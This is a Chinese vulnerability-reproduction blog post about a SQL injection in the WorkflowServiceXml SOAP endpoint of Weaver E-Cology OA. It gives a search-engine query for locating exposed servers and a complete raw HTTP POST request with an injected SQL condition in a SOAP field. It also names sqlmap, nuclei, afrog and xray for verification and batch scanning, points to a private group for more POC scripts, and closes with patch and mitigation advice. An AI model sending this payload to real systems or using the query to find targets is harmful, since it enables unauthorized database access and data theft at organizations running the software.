【漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞

avatar
作者
猴君
阅读量:0

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

泛微OAE-Cology 接口/services/WorkflowServiceXml 存在SQL注入漏洞,可获取数据库权限,导致数据泄露。

0x03 搜索引擎

app="泛微-OA(e-cology)" 

在这里插入图片描述

0x04 漏洞复现

POST /services/WorkflowServiceXml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Content-Type: text/xml Accept-Encoding: gzip Content-Length: 487  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> <soapenv:Header/>   <soapenv:Body>       <web:getHendledWorkflowRequestList>         <web:in0>1</web:in0>         <web:in1>1</web:in1>         <web:in2>1</web:in2>         <web:in3>1</web:in3>         <web:in4>             <web:string>1=1 AND 5615=5615</web:string>         </web:in4>       </web:getHendledWorkflowRequestList>   </soapenv:Body> </soapenv:Envelope> 

在这里插入图片描述
sqlmap验证

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、官方已发布升级补丁包,支持在线升级和离线补丁安装
https://www.weaver.com.cn/cs/securityDownload.html?src=cn

2、临时解决方案
使用WAF等安全设备进行防护。
在不影响业务的情况下配置URL访问控制策略。
限制访问来源地址,如非必要,不要将系统开放在互联网上。

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!